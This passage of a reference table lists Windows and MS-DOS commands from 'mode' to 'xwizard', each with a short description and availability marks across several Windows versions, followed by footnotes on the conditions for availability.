	The mode command is used to configure system devices, most often COM and LPT ports
	Y
	Y
	Y
	Y
	Y

	Mofcomp
	
	N
	Y
	Y
	Y
	Y

	More
	. The more command is used to display the information contained in a text file. The more command can also be used to paginate the results of any other Command Prompt or MS-DOS command.
	Y
	Y
	Y
	Y
	Y

	Mount
	The mount command is used to mount Network File System (NFS) network shares
	N
	N
	Y3
	Y3
	N

	Mountvol
	The mountvol command is used to display, create, or remove volume mount points.
	N
	Y
	Y
	Y
	Y

	Move
	The move command is used to move one or files from one folder to another. The move command is also used to rename directories.
	Y
	Y
	Y
	Y
	Y

	Mrinfo
	The mrinfo command is used to provide information about a router's interfaces and neighbors.
	N
	Y
	Y
	Y
	Y

	Msav
	The msav command starts Microsoft Antivirus.
	N
	N
	N
	N
	N

	Msbackup
	The msbackup command starts Microsoft Backup, a tool used to back up and restore one or more files.
	N
	N
	N
	N
	N

	Mscdex
	The mscdex command is used to provide CD-ROM access to MS-DOS.
	Y
	N
	N
	N
	N

	Msd
	The msd command starts Microsoft Diagnostics, a tool used to display information about your computer.
	N
	N
	N
	N
	N

	Msg
	The msg command is used to send a message to a user.
	N
	Y
	Y
	Y
	Y

	Msiexec
	The msiexec command is used to start Windows Installer, a tool used to install and configure software.
	N
	Y
	Y
	Y
	Y

	Muiunattend
	The muiunattend command starts the Multilanguage User Interface unattended setup process
	N
	N
	Y
	Y
	Y

	Nbtstat
	The nbtstat command is used to show TCP/IP information and other statistical information about a remote computer.
	Y
	Y
	Y
	Y
	Y

	Net
	The net command is used to display, configure, and correct a wide variety of network settings.
	Y
	Y
	Y
	Y
	Y

	Net1
	The net1 command is used to display, configure, and correct a wide variety of network settings.
	N
	Y
	Y
	Y
	Y

	Netcfg
	The netcfg command is used to install the Windows Preinstallation Environment (WinPE), a lightweight version of Windows used to deploy workstations.
	N
	N
	Y
	Y
	Y

	Netsh
	The netsh command is used to start Network Shell, a command-line utility used to manage the network configuration of the local, or a remote, computer.
	N
	Y
	Y
	Y
	Y

	Netstat
	The netstat command is most commonly used to display all open network connections and listening ports.
	Y
	Y
	Y
	Y
	Y

	Nfsadmin
	The nfsadmin command is used to manage Server for NFS or Client for NFS from the command line.
	N
	N
	Y3
	Y3
	N

	Nlsfunc
	The nlsfunc command is used to load information specific to a particular country or region.
	Y
	Y1
	Y1
	Y1
	Y1

	Nltest
	The nltest command is used to test secure channels between Windows computers in a domain and between domain controllers that are trusting other domains.
	N
	N
	N
	Y
	Y

	Nslookup
	The nslookup is most commonly used to display the hostname of an entered IP address. The nslookup command queries your configured DNS server to discover the IP address.
	N
	Y
	Y
	Y
	Y

	Ntbackup
	The ntbackup command is used to perform various backup functions from the Command Prompt or from within a batch or script file.
	N
	Y
	N
	N
	N

	Ntsd
	The ntsd command is used to perform certain command line debugging tasks.
	N
	Y
	N
	N
	N

	Ocsetup
	The ocsetup command starts the Windows Optional Component Setup tool, used to install additional Windows features.
	N
	N
	Y
	Y
	Y

	Openfiles
	The openfiles command is used to display and disconnect open files and folders on a system.
	N
	Y
	Y
	Y
	Y

	Path
	The path command is used to display or set a specific path available to executable files.
	Y
	Y
	Y
	Y
	Y

	Pathping
	The pathping command functions much like the tracert command but will also report information about network latency and loss at each hop.
	N
	Y
	Y
	Y
	Y

	Pause
	The pause command is used within a batch or script file to pause the processing of the file. When the pause command is used, a "Press any key to continue…" message displays in the command window.
	Y
	Y
	Y
	Y
	Y

	Pentnt
	The pentnt command is used to detect floating point division errors in the Intel Pentium chip. The pentnt command is also used to enable floating point emulation and disable floating point hardware.
	N
	Y
	N
	N
	N

	Ping
	The ping command sends an Internet Control Message Protocol (ICMP) Echo Request message to a specified remote computer to verify IP-level connectivity.
	Y
	Y
	Y
	Y
	Y

	Pkgmgr
	The pkgmgr command is used to start the Windows Package Manager from the Command Prompt. Package Manager installs, uninstalls, configures, and updates features and packages for Windows.
	N
	N
	Y
	Y
	Y

	Pnpunattend
	The pnpunattend command is used to automate the installation of hardware device drivers.
	N
	N
	Y
	Y
	Y

	Pnputil
	The pnputil command is used to start the Microsoft PnP Utility, a tool used to install a Plug and Play device from the command line.
	N
	N
	Y
	Y
	Y

	Popd
	The popd command is used to change the current directory to the one most recently stored by the pushd command. The popd command is most often utilized from within a batch or script file.
	N
	Y
	Y
	Y
	Y

	Power
	The power command is used to reduce the power consumed by a computer by monitoring software and hardware devices.
	Y
	N
	N
	N
	N

	Powercfg
	The powercfg command is used to manage the Windows power management settings from the command line.
	N
	Y
	Y
	Y
	Y

	Print
	The print command is used to print a specified text file to a specified printing device.
	Y
	Y
	Y
	Y
	Y

	Prompt
	The prompt command is used to customize the appearance of the prompt text in Command Prompt or MS-DOS.
	Y
	Y
	Y
	Y
	Y

	Pushd
	The pushd command is used to store a directory for use, most commonly from within a batch or script program.
	N
	Y
	Y
	Y
	Y

	Pwlauncher
	The pwlauncher command is used to enable, disable, or show the status of your Windows To Go startup options.
	N
	N
	N
	N
	Y

	Qappsrv
	The qappsrv command is used to display all Remote Desktop Session Host servers available on the network.
	N
	Y
	Y
	Y
	Y

	Qbasic
	The qbasic command starts QBasic, the MS-DOS based programming environment for the BASIC programming language.
	Y4
	N
	N
	N
	N

	Qprocess
	The qprocess command is used to display information about running processes.
	N
	Y
	Y
	Y
	Y

	Query
	The query command is used to display the status of a specified service.
	N
	N
	Y
	Y
	Y

	Quser
	The quser command is used to display information about users currently logged on to the system.
	N
	N
	Y
	Y
	Y

	Qwinsta
	The qwinsta command is used to display information about open Remote Desktop Sessions.
	N
	Y
	Y
	Y
	Y

	Rasautou
	The rasautou command is used to manage Remote Access Dialer AutoDial addresses.
	N
	Y
	Y
	Y
	Y

	Rasdial
	The rasdial command is used to start or end a network connection for a Microsoft client.
	N
	Y
	Y
	Y
	Y

	Rcp
	The rcp command is used to copy files between a Windows computer and a system running the rshd daemon.
	N
	Y
	Y8
	Y8
	N

	Rd
	The rd command is the shorthand version of the rmdir command.
	Y
	Y
	Y
	Y
	Y

	Rdpsign
	The rdpsign command is used to sign a Remote Desktop Protocol (RDP) file.
	N
	N
	N
	Y
	N

	Reagentc
	The reagentc command is used to configure the Windows Recovery Environment (RE).
	N
	N
	N
	Y
	Y

	Recimg
	
	N
	N
	N
	N
	Y

	Recover
	The recover command is used to recover readable data from a bad or defective disk.
	N
	Y
	Y
	Y
	Y

	Reg
	The reg command is used to manage the Windows Registry from the command line. The reg command can perform common registry functions like adding registry keys, exporting the registry, etc.
	N
	Y
	Y
	Y
	Y

	Regini
	The regini command is used to set or change registry permissions and registry values from the command line.
	N
	Y
	Y
	Y
	Y

	Register-cimprovider
	The register-cimprovider command is used to register a Common Information Model (CIM) Provider in Windows.
	N
	N
	N
	N
	Y

	Regsvr32
	The regsvr32 command is used to register a DLL file as a command component in the Windows Registry
	N
	Y
	Y
	Y
	Y

	Relog
	The relog command is used to create new performance logs from data in existing performance logs.
	N
	Y
	Y
	Y
	Y

	Rem
	The rem command is used to record comments or remarks in a batch or script file.
	Y
	Y
	Y
	Y
	Y

	Ren
	The ren command is the shorthand version of the rename command.
	Y
	Y
	Y
	Y
	Y

	Rename
	The rename command is used to change the name of the individual file that you specify.
	Y
	Y
	Y
	Y
	Y

	Repair-bde
	The repair-bde command is used to repair or decrypt a damaged drive that's been encrypted using BitLocker.
	N
	N
	N
	Y
	Y

	Replace
	The replace command is used to replace one or more files with one or more other files.
	Y
	Y
	Y
	Y
	Y

	Reset
	The reset command, executed as reset session, is used to reset the session subsystem software and hardware to known initial values.
	N
	Y
	Y
	Y
	Y

	Restore
	The restore command is used to restore files that were backed up using the backup command.
	N
	N
	N
	N
	N

	Rexec
	The rexec command is used to run commands on remote computers running the rexec daemon.
	N
	Y
	Y8
	N
	N

	Rmdir
	The rmdir command is used to delete an existing or completely empty folder.
	Y
	Y
	Y
	Y
	Y

	Robocopy
	The robocopy command is used to copy files and directories from one location to another. This command is also called Robust File Copy.
	N
	N
	Y
	Y
	Y

	Route
	The route command is used to manipulate network routing tables.
	Y
	Y
	Y
	Y
	Y

	Rpcinfo
	The rpcinfo command makes a remote procedure call (RPC) to an RPC server and reports what it finds.
	N
	N
	Y3
	Y3
	N

	Rpcping
	The rpcping command is used to ping a server using RPC.
	N
	N
	Y
	Y
	Y

	Rsh
	The rsh command is used to run commands on remote computers running the rsh daemon.
	N
	Y
	Y8
	Y8
	N

	Rsm
	The rsm command is used to manage media resources using Removable Storage.
	N
	Y
	Y
	N
	N

	Runas
	The runas command is used to execute a program using another user's credentials.
	N
	Y
	Y
	Y
	Y

	Rwinsta
	The rwinsta command is the shorthand version of the reset session command.
	N
	Y
	Y
	Y
	Y

	Sc
	The sc command is used to configure information about services. The sc command communicates with the Service Control Manager.
	N
	Y
	Y
	Y
	Y

	Scandisk
	The scandisk command is used to start Microsoft ScanDisk, a disk repair program.
	Y
	N
	N
	N
	N

	Scanreg
	The scanreg command starts Windows Registry Checker, a basic registry repair program and backup utility.
	Y
	N
	N
	N
	N

	Schtasks
	The schtasks command is used to schedule specified programs or commands to run a certain times. The schtasks command can be used to create, delete, query, change, run, and end scheduled tasks.
	N
	Y
	Y
	Y
	Y

	Sdbinst
	The sdbinst command is used to deploy customized SDB database files.
	N
	Y
	Y
	Y
	Y

	Secedit
	The secedit command is used to configure and analyze system security by comparing the current security configuration to a template.
	N
	Y
	Y
	Y
	Y

	Set
	The set command is used to display, enable, or disable environment variables in MS-DOS or from the Command Prompt.
	Y
	Y
	Y
	Y
	Y

	Setlocal
	The setlocal command is used to start the localization of environment changes inside a batch or script file.
	N
	Y
	Y
	Y
	Y

	Setspn
	The setspn command is used to manage the Service Principal Names (SPN) for an Active Directory (AD) service account.
	N
	N
	N
	Y
	Y

	Setver
	The setver command is used to set the MS-DOS version number that MS-DOS reports to a program.
	Y
	Y1
	Y1
	Y1
	Y1

	Setx
	The setx command is used to create or change environment variables in the user environment or the system environment.
	N
	N
	Y
	Y
	Y

	Sfc
	The sfc command is used to verify and replace important Windows system files. The sfc command is also referred to as System File Checker or Windows Resource Checker depending on the operating system.
	N
	Y
	Y
	Y
	Y

	Shadow
	The shadow command is used to monitor another Remote Desktop Services session.
	N
	Y
	Y
	Y
	N

	Share
	The share command is used to install file locking and file sharing functions in MS-DOS.
	Y
	Y1
	Y1
	Y1
	Y1

	Shift
	The shift command is used to change the position of replaceable parameters in a batch or script file.
	Y
	Y
	Y
	Y
	Y

	Showmount
	The showmount command is used to display information about NFS mounted file systems.
	N
	N
	Y3
	Y3
	N

	Shutdown
	The shutdown command can be used to shut down, restart, or log off the current system or a remote computer.
	N
	Y
	Y
	Y
	Y

	Smartdrv
	The smartdrv command installs and configures SMARTDrive, a disk caching utility for MS-DOS.
	Y
	N
	N
	N
	N

	Sort
	The sort command is used to read data from a specified input, sort that data, and return the results of that sort to the Command Prompt screen, a file, or another output device.
	Y
	Y
	Y
	Y
	Y

	Start
	The start command is used to open a new command line window to run a specified program or command. The start command can also be used to start an application without creating a new window.
	Y
	Y
	Y
	Y
	Y

	Subst
	The subst command is used to associate a local path with a drive letter. The subst command is a lot like the net use command except a local path is used instead of a shared network path.
	Y
	Y
	Y
	Y
	Y

	Sxstrace
	The sxstrace command is used to start the WinSxs Tracing Utility, a programming diagnostic tool.
	N
	N
	Y
	Y
	Y

	Sys
	The sys command is used to copy the MS-DOS system files and command interpreter to a disk.
	Y
	N
	N
	N
	N

	Systeminfo
	The systeminfo command is used to display basic Windows configuration information for the local or a remote computer.
	N
	Y
	Y
	Y
	Y

	Takeown
	The takedown command is used to regain access to a file that that an administrator was denied access to when reassigning ownership of the file.
	N
	N
	Y
	Y
	Y

	Taskkill
	The taskkill command is used to terminate a running task. The taskkill command is the command line equivalent of ending a process in Task Manager in Windows.
	N
	Y
	Y
	Y
	Y

	Tasklist
	Displays a list of applications, services, and the Process ID (PID) currently running on either a local or a remote computer.
	N
	Y
	Y
	Y
	Y

	Tcmsetup
	The tcmsetup command is used to setup or disable the Telephony Application Programming Interface (TAPI) client.
	N
	Y
	Y
	Y
	Y

	Telnet
	The telnet command is used to communicate with remote computers that use the Telnet protocol.
	Y
	Y
	Y5
	Y5
	Y5

	Tftp
	The tftp command is used to transfer files to and from a remote computer that's running the Trivial File Transfer Protocol (TFTP) service or daemon.
	N
	Y
	Y6
	Y6
	Y6

	Time
	The time command is used to show or change the current time.
	Y
	Y
	Y
	Y
	Y

	Timeout
	The timeout command is typically used in a batch or script file to provide a specified timeout value during a procedure. The timeout command can also be used to ignore keypresses.
	N
	N
	Y
	Y
	Y

	Title
	The title command is used to set the Command Prompt window title.
	N
	Y
	Y
	Y
	Y

	Tlntadmn
	The tlntadmn command is used to administer a local or remote computer running Telnet Server.
	N
	Y
	Y7
	Y7
	Y7

	Tpmvscmgr
	The tpmvscmgr command is used to create and destroy TPM virtual smart cards.
	N
	N
	N
	N
	Y

	Tracerpt
	The tracerpt command is used to process event trace logs or real-time data from instrumented event trace providers.
	N
	Y
	Y
	Y
	Y

	Tracert
	The tracert command sends Internet Control Message Protocol (ICMP) Echo Request messages to a specified remote computer with increasing Time to Live (TTL) field values and displays the IP address and hostname, if available, of the router interfaces between the source and destination.
	Y
	Y
	Y
	Y
	Y

	Tree
	The tree command is used to graphically display the folder structure of a specified drive or path.
	Y
	Y
	Y
	Y
	Y

	Tscon
	The tscon command is used to attach a user session to a Remote Desktop session.
	N
	Y
	Y
	Y
	Y

	Tsdiscon
	The tsdiscon command is used to disconnect a Remote Desktop session.
	N
	Y
	Y
	Y
	Y

	Tskill
	The tskill command is used to end the specified process.
	N
	Y
	Y
	Y
	Y

	Tsshutdn
	The tsshutdn command is used to remotely shut down or restart a terminal server.
	N
	Y
	N
	N
	N

	Type
	The type command is used to display the information contained in a text file.
	Y
	Y
	Y
	Y
	Y

	Typeperf
	The typerperf command displays performance data in the Command Prompt window or writes the data to specified log file.
	N
	Y
	Y
	Y
	Y

	Tzutil
	The tzutil command is used to display or configure the current system's time zone. The tzutil command can also be used to enable or disable Daylight Saving Time adjustments.
	N
	N
	N
	Y
	Y

	Umount
	The umount command is used to remove Network File System (NFS) mounted network shares
	N
	N
	Y3
	Y3
	N

	Undelete
	The undelete command is used to undo a deletion performed with the MS-DOS delete command.
	N
	N
	N
	N
	N

	Unformat
	The unformat command is used to undo the formatting on a drive performed by the MS-DOS format command.
	N
	N
	N
	N
	N

	Unlock
	The unlock command is used to unlock a drive, disabling direct disk access for a program.
	Y
	N
	N
	N
	N

	Unlodctr
	The unlodctr command removes Explain text and Performance counter names for a service or device driver from the Windows Registry.
	N
	Y
	Y
	Y
	Y

	Vaultcmd
	The vaultcmd command is used to create, remove, and show stored credentials.
	N
	N
	N
	Y
	Y

	Ver
	The ver command is used to display the current Windows or MS-DOS version number.
	Y
	Y
	Y
	Y
	Y

	Verify
	The verify command is used to enable or disable the ability of Command Prompt, or MS-DOS, to verify that files are written correctly to a disk.
	Y
	Y
	Y
	Y
	Y

	Vol
	The vol command shows the volume label and serial number of a specified disk, assuming this information exists.
	Y
	Y
	Y
	Y
	Y

	Vsafe
	The vsafe command is used to start VSafe, a basic virus protection system for MS-DOS.
	N
	N
	N
	N
	N

	Vssadmin
	The vssadmin command starts the Volume Shadow Copy Service administrative command line tool which displays current volume shadow copy backups and all installed shadow copy writers and providers
	N
	Y
	Y
	Y
	Y

	W32tm
	The w32tm command is used to diagnose issues with Windows Time.
	N
	Y
	Y
	Y
	Y

	Waitfor
	The waitfor command is used to send or wait for a signal on a system.
	N
	N
	Y
	Y
	Y

	Wbadmin
	The wbadmin command is used start and stop backup jobs, display details about a previous backup, list the items within a backup, and report on the status of a currently running backup.
	N
	N
	Y
	Y
	Y

	Wecutil
	The wecutil command is used to mange subscriptions to events that are forwarded from WS-Management supported computers.
	N
	N
	Y
	Y
	Y

	Wevtutil
	The wevtutil command starts the Windows Events Command Line Utility which is used to manage event logs and publishers.
	N
	N
	Y
	Y
	Y

	Where
	The where command is used to search for files that match a specified pattern.
	N
	N
	Y
	Y
	Y

	Whoami
	The whoami command is used to retrieve user name and group information on a network.
	N
	N
	Y
	Y
	Y

	Winmgmt
	
	N
	Y
	Y
	Y
	Y

	Winrm
	The winrm command is used to start the command line version of Windows Remote Management, used to manage secure communications with local and remote computers using web services.
	N
	N
	Y
	Y
	Y

	Winrs
	The winrs command is used to open a secure command window with a remote host.
	N
	N
	Y
	Y
	Y

	Winsat
	The winsat command starts the Windows System Assessment Tool, a program that assesses various features, attributes, and capabilities of a computer running Windows.
	N
	N
	Y
	Y
	Y

	Wmic
	The wmic command starts the Windows Management Instrumentation Command line (WMIC), a scripting interface that simplifies the use of Windows Management Instrumentation (WMI) and systems managed via WMI.
	N
	Y
	Y
	Y
	Y

	Wsmanhttpconfig
	The wsmanhttpconfig command is used to manage aspects of the Windows Remote Management (WinRM) service.
	N
	N
	Y
	Y
	Y

	Xcopy
	The xcopy command can copy one or more files or directory trees from one location to another. The xcopy command is generally considered a more "powerful" version of the copy command though the robocopy command trumps even xcopy.
	Y
	Y
	Y
	Y
	Y

	Xwizard
	The xwizard command, short for Extensible Wizard, is used to register data in Windows, often from a preconfigured XML file.
	N
	N
	N
	Y
	Y


[1] This command is not available in 64-bit versions of this operating system.
[2] This command is only available in this version of Windows when LPD Print Service is turned on from Windows Features.
[3] This command is only available in this version of Windows when Services for NFS is turned on from Windows Features.
[4] This command is only available in this version of Windows when copied from the installation media.
[5] This command is only available in this version of Windows when Telnet Client is turned on from Windows Features.
[6] This command is only available in this version of Windows when TFTP Client is turned on from Windows Features.
[7] This command is only available in this version of Windows when Telnet Server is turned on from Windows Features.
[8] This command is only available in this version of Windows when Subsystem for UNIX-based Applications is turned on from Windows Features and Utilities and SDK for UNIX-based Applications is downloaded for Windows Vista here or Windows 7 here.
[9] While there is no actual manage-bde command in Windows Vista, there is a manage-bde.wsf script that can be used to perform similar tasks via CScript.
[10] This command is only available in this version of Windows from the Command Prompt available in System Recovery Options.
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